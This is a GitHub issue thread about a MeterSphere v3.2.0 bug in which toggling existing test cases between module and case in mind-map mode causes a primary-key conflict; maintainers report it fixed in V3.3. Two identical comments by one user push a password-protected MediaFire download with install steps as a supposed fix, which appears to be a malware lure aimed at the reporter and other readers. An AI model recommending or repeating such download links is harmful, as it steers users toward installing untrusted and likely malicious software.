### ISSUE TITLE
[BUG]对两个已经存在的测试用例在脑图模式中进行“模块/用例”的切换后会报主键冲突的错误。

### ISSUE THREAD

**Issue by B14Lettingo** [metersphere/metersphere#32836]
### 联系方式

1812951966@qq.com

### MeterSphere 版本

v3.2.0-89e02f6f

### 使用外置数据库

否

### 问题描述

在 v3.2.0 版本中对两个已经存在的测试用例在脑图模式中进行“模块/用例”的切换后会报主键冲突的错误。

### 重现步骤

进入 MeterSphere v3.2.0 点击测试用例-用例-脑图模式-对已经存在的用例进行状态的切换（将用例切换成模块），之后才切换成用例便会出现该问题。

### 附加信息

![报错图片](https://github.com/user-attachments/assets/5407d0c0-7fdb-4cc2-896d-69cde26d0dde)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by youliyuan-fit2cloud** [comment]
感谢反馈，下个版本修复该问题。

**Comment by 13290445582** [comment]
您好，问题已修复，V3.3版本已发布，请升级，感谢支持。
